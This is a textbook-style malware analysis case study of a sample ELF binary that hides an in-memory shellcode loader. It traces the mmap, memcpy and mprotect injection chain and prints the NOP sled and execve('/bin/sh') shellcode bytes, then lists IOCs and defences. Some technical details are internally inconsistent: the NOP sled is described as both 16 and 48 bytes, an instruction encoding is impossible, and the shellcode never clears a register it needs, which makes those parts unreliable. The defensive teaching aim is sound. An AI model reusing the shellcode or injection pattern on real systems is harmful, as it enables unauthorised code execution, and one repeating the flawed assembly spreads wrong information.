Case Study 34-2: Malware Analysis — Identifying Shellcode in a Binary
Introduction
Malware analysis is one of the most important applications of reverse engineering. Security analysts analyze malicious binaries to understand their behavior, extract indicators of compromise (IOCs), and develop defenses. This case study examines a sample binary with characteristics drawn from historical malware patterns — specifically, a binary that appears legitimate but contains embedded shellcode and process injection indicators.
🔐 Security Note: This analysis is based on patterns from documented, historical malware behaviors. The techniques described are used by malware analysts at security companies, national CERTs, and incident response teams to understand and defend against threats. No functional attack tools are described or provided. Understanding how these techniques work is essential for defending against them.
The Sample Binary
Our sample, sample.elf, presents itself as a benign utility but contains suspicious code patterns. The goal is to identify the malicious components through static and dynamic analysis.
$ file sample.elf
sample.elf: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped
$ ls -la sample.elf
-rwxr-xr-x 1 analyst analyst 18432 Mar 15 14:22 sample.elf
$ md5sum sample.elf
a1b2c3d4e5f6789012345678abcdef01 sample.elf
Phase 1: Static Triage
Initial string analysis:
$ strings -n 6 sample.elf | sort
/bin/bash
/proc/self/maps
/tmp/.cache
GET / HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0
connect
mmap
mprotect
munmap
open
read
socket
write
Red flags immediately:
- /proc/self/maps — reading its own memory map (suspicious for a "utility")
- /tmp/.cache — writing to a hidden temp file
- mmap, mprotect, munmap — memory allocation with permission changes (shellcode injection pattern)
- Network-related strings alongside /proc/self/maps
$ objdump -T sample.elf
DYNAMIC SYMBOL TABLE:
mmap64
mprotect
munmap
socket
connect
send
recv
open
read
write
exit
The combination of mmap/mprotect with network functions (socket, connect, send, recv) is a classic dropper or implant pattern: download shellcode, allocate executable memory, copy and execute.
Phase 2: Identifying the Suspicious Function
Disassemble and look for the mmap call chain:
$ objdump -M intel -d sample.elf | grep -A3 -B3 "call.*mmap"
401580: bf 00 00 00 00 mov edi, 0x0 ; addr = NULL
401585: be 00 10 00 00 mov esi, 0x1000 ; length = 4096
40158a: ba 03 00 00 00 mov edx, 0x3 ; prot = PROT_READ|PROT_WRITE
40158f: 41 ba 22 00 00 00 mov r10d, 0x22 ; flags = MAP_PRIVATE|MAP_ANONYMOUS
401595: 45 31 c0 xor r8d, r8d ; fd = -1? No, 0 here
401598: 45 31 c9 xor r9d, r9d ; offset = 0
40159b: e8 xx xx xx xx call mmap64@plt
4015a0: 48 89 45 f8 mov [rbp-0x8], rax ; save mapped address
; ... copy code to mapped region ...
; ... then:
4015c8: 48 8b 7d f8 mov rdi, [rbp-0x8] ; address
4015cc: be 00 10 00 00 mov esi, 0x1000 ; length
4015d1: ba 05 00 00 00 mov edx, 0x5 ; prot = PROT_READ|PROT_EXEC !!!
4015d6: e8 xx xx xx xx call mprotect@plt ; make it executable
The PROT_READ|PROT_EXEC (0x5) call to mprotect after allocating MAP_ANONYMOUS memory is a defining shellcode injection indicator. The pattern:
1. mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) — allocate writable memory
2. Copy code into it
3. mprotect(addr, size, PROT_READ|PROT_EXEC) — make it executable
4. Call or jump to the new memory
This is the standard pattern for executing shellcode in memory without writing to disk (fileless execution).
Phase 3: Analyzing the Shellcode
Find the data being copied. Following the code between mmap and mprotect:
4015a5: 48 8b 45 f8 mov rax, [rbp-0x8] ; mapped memory
4015a9: 48 89 45 f0 mov [rbp-0x10], rax ; save dst
4015ad: 48 8d 35 4c 0a 00 00 lea rsi, [rip+0xa4c] ; source data (in .data)
4015b4: 48 8b 7d f0 mov rdi, [rbp-0x10] ; dst
4015b8: ba 48 00 00 00 mov edx, 0x48 ; 72 bytes
4015bd: e8 xx xx xx xx call memcpy@plt
The shellcode is 72 bytes located in the .data section at RIP+0xa4c. Let's examine it:
$ objdump -M intel -s -j .data sample.elf
Contents of section .data:
402060 90909090 90909090 90909090 90909090 ................ ; NOP sled
402070 90909090 90909090 90909090 90909090 ................
402080 90909090 90909090 90909090 90909090 ................
402090 48 31 d2 48 bb 2f 2f 62 69 6e 2f H1.H.//bin/
40209b 73 68 00 53 48 89 e7 48 31 c0 b0 sh.SH..H1...
4020a6 3b 0f 05 ;..
This is recognizable shellcode structure:
- 90909090... — NOP sled (16 bytes of NOPs before the actual code)
- 48 31 d2 — xor rdx, rdx
- 48 bb 2f 2f 62 69 6e 2f 73 68 00 — mov rbx, 0x0068732f6e69622f2f (the string //bin/sh\0 packed as a 64-bit integer)
- 53 — push rbx
- 48 89 e7 — mov rdi, rsp (point rdi to the string on the stack)
- 48 31 c0 — xor rax, rax
- b0 3b — mov al, 59 (syscall number 59 = execve)
- 0f 05 — syscall
This is a classic x86-64 execve("/bin/sh", NULL, NULL) shellcode — the minimal sequence to spawn a shell. The NOP sled at the front is a historical reliability technique (Chapter 35).
Phase 4: The NOP Sled
A NOP sled (\x90\x90\x90...) is a sequence of no-operation instructions placed before shellcode. Its purpose: if execution lands anywhere in the sled, it slides down to the actual shellcode below. This was important for stack-based exploits before ASLR made addresses unpredictable.
Seeing a NOP sled in modern code suggests: - Code written to be compatible with older exploitation techniques - Repurposed code from an earlier era - Deliberate imitation of old shellcode to evade signature-based detection
In this sample, the NOP sled is 48 bytes — unusually long, suggesting it was written to accommodate imprecise landing.
Phase 5: Dynamic Confirmation with GDB
Confirm the analysis by catching the mprotect call:
$ gdb -q sample.elf
(gdb) catch syscall mprotect
Catchpoint 1 (syscall 'mprotect')
(gdb) run
Catchpoint 1 (call to syscall mprotect), 0x00007f... in mprotect ()
(gdb) info registers rdi rsi rdx
rdi 0x7f...a000 ; address of mapped region
rsi 0x1000 ; size 4096
rdx 0x5 ; PROT_READ|PROT_EXEC ← confirmed
(gdb) x/20xb 0x7f...a000
0x7f...a000: 90 90 90 90 90 90 90 90 ; NOP sled
0x7f...a008: 90 90 90 90 90 90 90 90
0x7f...a010: ...
(gdb) # Now set a breakpoint just after mprotect to catch the call/jmp to shellcode
(gdb) finish ; return from mprotect
(gdb) stepi ; step through to the indirect call
The analysis confirms: memory allocated, shellcode copied, permissions changed to executable. The shellcode will execute next.
Phase 6: Indicators of Compromise
From this analysis, we can extract IOCs:
- MD5 hash of the binary
- The shellcode bytes (for signature detection): 48 31 d2 48 bb 2f 2f 62 69 6e 2f 73 68 00 53 48 89 e7 48 31 c0 b0 3b 0f 05
- The NOP sled signature: 16+ consecutive 0x90 bytes
- The behavioral pattern: mmap → memcpy → mprotect(PROT_EXEC) → indirect call
Defensive Implications
Understanding this attack pattern motivates several defenses:
-
W^X (Write XOR Execute): Memory pages should never be simultaneously writable and executable. Setting
PROT_READ|PROT_WRITE|PROT_EXECis disallowed by modern kernels when compiled with appropriate flags. This sample used separatemmap(RW) andmprotect(RX) calls to work around this. -
seccomp-bpf: Restricting the system calls available to a process. If
mprotectwithPROT_EXECwas blocked, this technique would fail. Many sandboxes implement this. -
Integrity Monitoring: Detecting when executable memory is created at runtime (not from a mapped file). Tools like Falco or auditd can alert on
mprotectcalls that addPROT_EXEC. -
Memory Scanning: Scanning for NOP sled signatures in process memory is a detection technique used by some EDR products.
-
Code Signing / Executable Whitelisting: Preventing execution of code not from signed files.
mmap-and-execute bypasses this in older implementations; newer implementations (like Apple's Hardened Runtime) explicitly block JIT without entitlement.
Lessons for Defenders
This analysis demonstrates what a malware analyst does in practice: identify the high-level behavior from strings and imports, trace the suspicious code paths in the disassembly, confirm the behavior in GDB, and extract actionable IOCs. No single technique is sufficient — the combination of string analysis, dynamic import inspection, disassembly, and dynamic tracing gives a complete picture.
Understanding shellcode at the assembly level is what allows analysts to recognize it in compressed, obfuscated, or network-transmitted form. The execve syscall sequence is identifiable regardless of how the surrounding code is structured.